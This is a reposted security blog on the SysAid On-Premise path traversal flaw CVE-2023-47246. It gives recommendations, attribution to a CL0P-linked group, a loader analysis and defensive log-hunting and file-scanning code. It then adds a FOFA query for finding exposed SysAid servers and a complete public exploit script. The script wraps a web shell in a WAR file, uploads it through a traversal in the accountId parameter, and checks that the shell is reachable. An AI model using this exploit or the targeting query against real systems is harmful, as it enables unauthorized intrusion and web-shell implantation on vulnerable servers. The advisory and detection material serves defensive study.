CVE-2023-47246 SysAid Zero-Day Vulnerability Coverage Report (EXP)


Introduction

On November 8, 2023, SysAid published an advisory for CVE-2023-47246, a critical zero-day vulnerability in its SysAid On-Premise software. SysAid describes the flaw as a path traversal vulnerability that leads to code execution in the same software. This blog covers immediate recommendations for SysAid On-Premise customers, best practices for long-term protection against this class of vulnerability, and a brief analysis of the attack chain.

Recommendations

SysAid recommends that customers running the on-premise software take two actions:

  • Upgrade to version 23.3.6

  • Perform a full system and network assessment to detect potential compromise

If any indicators of compromise (IoCs) are found, Zscaler recommends that SysAid On-Premise customers follow their incident response protocol and act immediately. Zscaler also strongly recommends upgrading to the latest version. For more information on upgrading, see here and here.

Attribution

Lace Tempest (DEV-0950 / TA-505) is believed to be the threat actor exploiting this vulnerability. The group was responsible for exploiting the MOVEit Transfer vulnerability earlier this year and is associated with the ransomware group known as "CL0P".

Figure 1: Attack chain showing how the threat actor exploited CVE-2023-47246 to infiltrate SysAid systems

Possible Execution

How it works

The threat actor exploited the SysAid CVE-2023-47246 path traversal vulnerability to upload a WAR archive containing a WebShell and various payloads into the webroot of the SysAid Tomcat web service. The vulnerability lies in the doPost method of the SysAid com.ilient.server.UserEntry class. Exploitation involves manipulating the accountID parameter to introduce a path traversal, which lets the attacker choose where on the vulnerable server the WebShell is written. The attack is carried out by sending a POST request whose body is a compressed WAR file containing the WebShell. The threat actor then accesses the WebShell, which lets them interact with the compromised system.
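As an added defensive example (not from the report or from Zscaler), the Python below flags /userentry requests in Tomcat access logs whose accountId parameter escapes the usersfiles upload directory, and shows the containment check a hardened doPost() would apply before building a write path. The log lines, client addresses, directory names and the "/usersfiles" base are constructed for the example.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined-format access log line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (not from the report): a legitimate userentry call,
# a traversal into tomcat/webapps, the follow-up WebShell request, and a
# double-percent-encoded variant of the same traversal.
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Nov/2023:10:01:02 +0000] "POST /userentry?accountId=12345&symbolName=test HTTP/1.1" 200 512',
    '198.51.100.7 - - [08/Nov/2023:10:05:44 +0000] "POST /userentry?accountId=/../../../tomcat/webapps/QZ7K2/&symbolName=test HTTP/1.1" 200 0',
    '198.51.100.7 - - [08/Nov/2023:10:05:53 +0000] "GET /QZ7K2/shell.jsp HTTP/1.1" 200 44',
    '203.0.113.9 - - [08/Nov/2023:11:12:00 +0000] "POST /userentry?accountId=%252e%252e%2F%252e%252e%2Ftomcat%2Fwebapps%2FAB12C%2F HTTP/1.1" 200 0',
]


def fully_decode(value, rounds=3):
    """Strip nested percent-encoding (%252e -> %2e -> '.') before inspection."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def account_id_escapes(account_id, base="/usersfiles"):
    """True when accountId, resolved under the upload directory, leaves it.
    This is the containment check a hardened doPost() would apply."""
    cleaned = account_id.replace("\\", "/").lstrip("/")
    resolved = posixpath.normpath(posixpath.join(base, cleaned))
    return not (resolved == base or resolved.startswith(base + "/"))


def flag_userentry_requests(log_lines):
    """Return (client_ip, method, decoded accountId) for each /userentry
    request whose accountId escapes the usersfiles directory."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or urlsplit(m["target"]).path.lower() != "/userentry":
            continue
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for raw in query.get("accountId", []):
            account_id = fully_decode(raw)
            if account_id_escapes(account_id):
                hits.append((m["ip"], m["method"], account_id))
    return hits
```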

PowerShell used to execute GraceWire

The threat actor leveraged the unauthorized access to deploy a PowerShell script that executes the GraceWire loader on the victim's machine.

The PowerShell script (shown below) enumerates all files in the C:\Program Files\SysAidServer\tomcat\webapps\usersfiles directory and then checks for antivirus or anti-malware processes whose names begin with "Sophos". If the script detects such defensive software running on the victim's system, it exits to avoid detection.

If the script does not detect antivirus or anti-malware software, it executes the GraceWire loader (user.exe) on the victim's machine.

Figure 2: PowerShell script used to launch the GraceWire loader (user.exe)

GraceWire Loader Analysis

The GraceWire loader follows a series of steps. First, it checks for a file named <filename>.bin, which contains the encrypted payload. If the file exists in the current directory, the loader reads its contents with the ReadFile() function and stores the data in allocated memory. It then decrypts the data and computes a checksum. If the checksum verifies, the program executes the decrypted bin payload, which deploys the GraceWire trojan. The loader also injects the GraceWire trojan into various processes, including:

  • spoolsv.exe

  • msiexec.exe

  • svchost.exe

While examining the code, we also found debug print statements that reveal the GraceWire loader's control flow.

Figure 3: Screenshot of debug print statements showing the GraceWire loader's control flow
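An added hunting example (not part of the report): given a listing of the Tomcat webapps tree named above, it reports top-level webapps outside a baseline and staged files worth triage, such as user.exe or a .bin companion in usersfiles, a loose WAR awaiting auto-deploy, or a JSP inside an unexpected webapp. The baseline set KNOWN_WEBAPPS, the extension list and the sample listing are assumptions for this example, not SysAid's defaults.

```python
import os

# Path named in the report; the baseline below is a hypothetical clean-install
# set, to be replaced with the directories present on an unpatched-but-clean host.
TOMCAT_WEBAPPS = r"C:\Program Files\SysAidServer\tomcat\webapps"
KNOWN_WEBAPPS = {"ROOT", "usersfiles"}
SUSPECT_EXTENSIONS = {".exe", ".bin", ".ps1", ".bat", ".dll", ".jsp", ".war"}

# Constructed listing of (path relative to webapps, is_directory) mimicking a
# compromised tree: a new five-character webapp, its WAR, and a loader staged
# in usersfiles next to legitimate attachments.
SAMPLE_LISTING = [
    ("ROOT", True), ("ROOT/index.jsp", False),
    ("usersfiles", True), ("usersfiles/12345", True),
    ("usersfiles/12345/ticket.png", False),
    ("usersfiles/user.exe", False), ("usersfiles/user.bin", False),
    ("QZ7K2", True), ("QZ7K2/shell.jsp", False), ("QZ7K2.war", False),
]


def classify(entries, known=KNOWN_WEBAPPS):
    """Return (unexpected top-level webapps, suspect files), both sorted."""
    unexpected, suspect = set(), []
    for rel, is_dir in entries:
        parts = rel.split("/")
        top = parts[0]
        if is_dir:
            if len(parts) == 1 and top not in known:
                unexpected.add(top)   # an uploaded WAR explodes into a new dir
            continue
        ext = os.path.splitext(parts[-1])[1].lower()
        # Files are "staged" if they sit in the upload folder, in a webapp
        # outside the baseline, or loose at the webapps root.
        staged = top == "usersfiles" or top not in known or len(parts) == 1
        if staged and ext in SUSPECT_EXTENSIONS:
            suspect.append(rel)
    return sorted(unexpected), sorted(suspect)


def scan(webapps_dir=TOMCAT_WEBAPPS, known=KNOWN_WEBAPPS):
    """Walk a live webapps directory and classify what is found."""
    entries = []
    for dirpath, dirnames, filenames in os.walk(webapps_dir):
        for name, is_dir in [(d, True) for d in dirnames] + [(f, False) for f in filenames]:
            rel = os.path.relpath(os.path.join(dirpath, name), webapps_dir)
            entries.append((rel.replace(os.sep, "/"), is_dir))
    return classify(entries, known)
```

Anything `classify` reports should be compared against file timestamps and the access-log hits around the same time; a new webapp directory alone is not proof of compromise.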

Getting Rid of Evidence

Once inside the victim's system, the threat actor uses another PowerShell script to systematically erase traces and evidence of their malicious activity. This post-exploitation tactic aims to remove the digital footprint and minimize the chance of detection by eliminating indicators of compromise (IoCs).

Possible Additional Exploitation

Microsoft posted a tweet highlighting exploitation of this vulnerability by the CL0P ransomware group and strongly recommended updating affected systems.

Additionally, SysAid found supporting evidence that the following PowerShell command was used to download and execute Cobalt Strike.

Figure 4: PowerShell command that downloads and executes Cobalt Strike

Best Practices

  • Protect crown-jewel applications by limiting lateral movement with Zscaler Private Access, especially with the Application Security module enabled.

  • Route all server traffic through Zscaler Private Access with the Application Security module enabled and through Zscaler Internet Access; this provides the visibility needed to identify and block malicious activity from compromised systems/servers.

  • Turn on Zscaler Advanced Threat Protection to block all known command-and-control domains. This adds protection if an adversary uses this vulnerability to deploy malware.

  • Extend command-and-control protection to all ports and protocols, including emerging C2 destinations, with Zscaler Cloud Firewall (Cloud IPS module). Again, this adds protection if an adversary uses this vulnerability to deploy malware.

  • Use Zscaler Cloud Sandbox to stop unknown malware delivered as part of a second-stage payload.

  • Make sure you are inspecting all SSL traffic.

  • Restrict traffic to critical infrastructure to an allow-list of known-good destinations.


FOFA

body="sysaid-logo-dark-green.png" || title="SysAid Help Desk Software" || body="Help Desk software <a href="http://www.sysaid.com">by SysAid</a>"

https://github.com/W01fh4cker/CVE-2023-47246-EXP/blob/main/CVE-2023-47246-EXP.py

import argparse
import binascii
import random
import time
import zipfile
import zlib

import requests
import urllib3

urllib3.disable_warnings()


def compressFile(shellFile, warFile):
    # Pack the shell file into a WAR (zip) archive
    try:
        with zipfile.ZipFile(warFile, 'w', zipfile.ZIP_DEFLATED) as zipf:
            zipf.write(shellFile)
        return True
    except Exception:
        return False


def getHexData(warFile):
    # zlib-compress the WAR and return it hex-encoded
    with open(warFile, 'rb') as warfile:
        data = warfile.read()
    compressed_data = zlib.compress(data)
    hex_data = binascii.hexlify(compressed_data).decode()
    return hex_data


def generateRandomDirectoryName(num):
    # Random uppercase/digit name for the dropped webapp directory
    charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    return ''.join(random.choice(charset) for _ in range(num))


def get_random_agent():
    agent_list = [
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7',
        'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0',
        'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0',
        'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17',
        'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/601.7.8',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7',
        'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0',
        'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50',
        'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0',
        'Mozilla/5.0 (iPad; CPU OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G35 Safari/601.1',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393',
        'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/537.86.7',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 OPR/39.0.2256.48',
        'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 OPR/39.0.2256.48',
        'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:47.0) Gecko/20100101 Firefox/47.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36',
        'Mozilla/5.0 (Windows NT 5.1; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (X11; CrOS x86_64 8350.68.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/52.0.2743.84 Mobile/13G35 Safari/601.1.46',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36',
    ]
    return agent_list[random.randint(0, len(agent_list) - 1)]


def shellUpload(url, proxy, directoryName, shellFile):
    # accountId carries the traversal that redirects the write into tomcat/webapps
    userEntryUrl = f"{url}/userentry?accountId=/../../../tomcat/webapps/{directoryName}/&symbolName=test&base64UserName=YWRtaW4="
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": get_random_agent()
    }
    shellFileName = shellFile.split(".")[0]
    warFile = f"{shellFileName}.war"
    if compressFile(shellFile, warFile):
        shellHex = getHexData(warFile=warFile)
        data = binascii.unhexlify(shellHex)
        resp = requests.post(url=userEntryUrl, headers=headers, data=data, proxies=proxy, verify=False)
        print("\033[92m[+] Shell file compressed successfully!\033[0m")
        return resp
    else:
        print("\033[91m[x] Shell file compression failed.\033[0m")
        exit(0)


def shellTest(url, proxy, directoryName, shellFile):
    # Check whether the dropped file is reachable under the new webapp directory
    userEntryUrl = f"{url}/{directoryName}/{shellFile}"
    headers = {"User-Agent": get_random_agent()}
    resp = requests.get(url=userEntryUrl, headers=headers, timeout=15, proxies=proxy, verify=False)
    return resp, userEntryUrl


def exploit(url, proxy, shellFile):
    print(f"\033[94m[*] start to attack: {url}\033[0m")
    directoryName = generateRandomDirectoryName(5)
    userentryResp = shellUpload(url, proxy, directoryName, shellFile)
    print("\033[94m[*] Wait 9 seconds...\033[0m")
    time.sleep(9)
    cveTestResp, userEntryUrl = shellTest(url, proxy, directoryName, shellFile)
    if userentryResp.status_code == 200 and cveTestResp.status_code == 200:
        print(f"\033[92m[+] The website [{url}] has vulnerability CVE-2023-47246! Shell path: {userEntryUrl}\033[0m")
    else:
        print(f"\033[91m[x] The website [{url}] has no vulnerability CVE-2023-47246.\033[0m")


if __name__ == "__main__":
    # The original ASCII-art banner did not survive extraction; only its text lines are kept
    banner = """
    CVE-2023-47246 SysAid Server RCE
    Author: W01fh4cker
    Blog: https://w01fh4cker.github.io
    """
    print(banner)
    parser = argparse.ArgumentParser(
        description="SysAid Server remote code execution vulnerability CVE-2023-47246 Written By W01fh4cker",
        epilog="eg: python CVE-2023-47246-RCE.py -u https://192.168.149.150:8443")
    parser.add_argument("-u", "--url", help="target URL")
    parser.add_argument("-p", "--proxy", help="proxy, eg: http://127.0.0.1:7890")
    parser.add_argument("-f", "--file", help="shell file, eg: shell.jsp")
    args = parser.parse_args()
    if args.url.endswith("/"):
        url = args.url[:-1]
    else:
        url = args.url
    if args.proxy:
        proxy = {'http': args.proxy, 'https': args.proxy}
    else:
        proxy = {}
    exploit(url, proxy, args.file)


Originally published on the WeChat public account Ots安全: CVE-2023-47246 SysAid Zero-Day Vulnerability Coverage Report (EXP)

Copyright notice: published by admin on November 18, 2023 at 1:59 PM.
Please credit when reposting: CVE-2023-47246 SysAid Zero-Day Vulnerability Coverage Report (EXP) | CTF导航
